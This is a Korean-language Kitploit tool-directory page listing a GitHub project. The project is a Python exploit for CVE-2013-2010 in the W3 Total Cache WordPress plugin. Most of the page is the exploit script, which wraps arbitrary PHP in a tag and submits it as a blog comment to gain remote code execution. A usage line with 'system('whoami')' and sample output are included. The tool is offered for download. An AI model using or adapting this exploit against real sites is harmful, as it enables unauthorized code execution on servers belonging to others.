Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/spyata123/w3-total-cache-cve-2013-2010
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubspyata123/w3-total-cache-cve-2013-2010

w3-total-cache-cve-2013-2010

w3 total cache cve 2013-2010에서 실행되는 원격 코드 실행

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
11년 전아직 검토되지 않음

w3-total-cache-cve-2013-2010

w3 total cache cve 2013-2010에서 원격 코드 실행

사용법: python3 w3tc_rce_exploit.py -u http://example.com -p "system('whoami');"

출력: [*] Targeting: http://example.com [+] Payload sent successfully. [+] Check the target for execution of the payload.


import requests import argparse

def exploit_rce(target_url, payload): """Exploit the RCE vulnerability by sending a crafted comment.""" # Construct the URL for posting a comment post_url = f"{target_url}/wp-comments-post.php"

root@kitploit:~
# Prepare the payload for the comment
data = {
    'author': 'attacker',
    'email': '[email protected]',
    'url': 'http://example.com',
    'comment': payload,
    'submit': 'Submit Comment',
    'post_id': 1  # Assuming post ID 1 exists; adjust as necessary
}

try:
    # Send the POST request
    response = requests.post(post_url, data=data)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the target for execution of the payload.")
    else:
        print("[-] Failed to send payload.")
        print(f"Status Code: {response.status_code}")

except Exception as e:
    print(f"Error during exploitation: {str(e)}")

def main(): parser = argparse.ArgumentParser(description='Exploit CVE-2013-2010 in W3 Total Cache') parser.add_argument('-u', '--url', required=True, help='Target WordPress URL') parser.add_argument('-p', '--payload', required=True, help='PHP code to execute')

root@kitploit:~
args = parser.parse_args()

target_url = args.url.rstrip('/')

# Construct a malicious payload (e.g., a simple PHP command)
php_payload = f"<?php {args.payload} ?>"

print(f"[*] Targeting: {target_url}")

exploit_rce(target_url, php_payload)

if name == "main": main()

도구 다운로드